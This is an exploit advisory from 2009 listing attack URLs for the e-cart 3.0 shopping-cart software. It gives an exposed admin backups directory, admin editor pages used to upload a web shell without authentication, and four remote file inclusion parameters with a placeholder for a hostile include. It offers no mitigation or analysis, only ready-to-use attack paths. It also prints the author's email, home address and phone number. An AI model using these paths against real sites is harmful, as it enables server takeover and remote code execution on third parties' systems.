ecart 3.0 Multiple Vulnerabilities.pdf

1 ======================================================================================== 2 | # Title : e−cart 3.0 Multiple Vulnerabilities | 3 | # Author : indoushka | 4 | # email : indoushka@hotmail.com | 5 | # Home : Souk Naamane − 04325 − Oum El Bouaghi − Algeria −(00213771818860) | 6 | # Web Site : www.iq−ty.com | 7 | # Script : e−cart 3.0 | 8 | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | 9 | # Bug : Multti Vulnerability | 10 ====================== Exploit By indoushka ================================= 11 | # Exploit : 12 | 13 | Backup 14 | 15 | 1− http://server/e−cart/admin/backups/ 16 | 17 | Upload Shell 18 | 19 | 2− http://server/e−cart/admin/editor/images.php ** to Upload Evil 20 | 3− http://server/e−cart/admin/editor/image.php ** too Upload Evil 21 | 4− http://server/e−cart/images/upload/Evil ** 2 Find Evil 22 | 23 | RFi 24 | 25 | 5− http://server/e−cart/admin/includes/application_top.php?language=[EV!L] 26 | 6− http://server/e−cart/admin/includes/application_top.php?current_page=[EV!L] 27 | 7− http://server/e−cart/includes/boxes/column_banner.php?language=[EV!L] 28 | 8− http://server/e−cart/includes/classes/shipping.php?include_modules[i][file]=[EV!L] 29 | 30 ================================ Dz−Ghost Team ======================================== 31 Greetz : all my friend * Dos−Dz * Snakespc * His0k4 * Hussin−X * Str0ke * Saoucha * Star08 | 32 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− Page 1/1 ecart 3.0 Multiple Vulnerabilities indoushka 12/26/2009